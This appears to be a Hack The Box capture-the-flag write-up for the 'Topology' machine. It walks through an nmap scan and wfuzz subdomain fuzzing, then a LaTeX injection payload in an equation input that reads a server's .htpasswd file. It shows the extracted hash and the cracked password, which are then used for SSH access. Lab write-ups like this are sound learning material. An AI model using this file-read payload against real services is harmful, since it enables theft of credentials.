Tolopogy | HTB Wreiteup | Aayush Agrawal

Establishing the VPN Connection

Download the VPN connection file from HTB, after selecting the desired server (make sure no machines are active on your account at this point).

I use OpenVPN so in the terminal type the command, openvpn <address_for_the_.ovpn_file>

Note: Command to install OpenVPN in case you do not have it already: sudo apt-get install openvpn

It should set up a VPN connection between your host machine and the HTB server, and a small lock icon with the IP Address for the connection should pop up in the top-right notification section of your Kali system. Try running the command as the root user, in case the normal user account does not get a successful conn

Now proceed to search for the machine, using the search parameter machine: topology in our case on the app.hackthebox.com site. Open the machine information page, and click on the Join Machine button.

Running an Nmap Scan

On entering the IP Address for the machine, we are welcomed with the above webpage, so we will look for open ports through an Nmap scan.

nmap -A -sV 10.10.11.217

Open Ports: 22, 80

Adding IP to /etc/hosts

wfuzz -c -u 'http://topology.htb/' -H 'http://FUZZ.topology.htb/' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

Command to install seclists: sudo apt install seclists

Directory Review

Looking Up Exploit for Latex Software

Injecting the above code into /equation.php input box,

Output:

Getting htpasswd for root directory from Apache vulnerability

Apache version is 2.4.41

Ref. Link: stackoverflow.com/questions/37545711/htpass..

command injected: $\lstinputlisting{/var/www/dev/.htpasswd}$

Output:

Output: vdaisley:$apr1!1ONUB/S2$58eeNVirnRDB5zAIzIxTY0

Store the output in a .txt file and run against john as,

hashcat analysis for the hash file,

we get the decrypted password: calculus20

We can get ssh login for the user vdaisley:

We got the user flag, and root flag. :D

Reference Link: https://techyrick.com/topology-htb-walkthrough/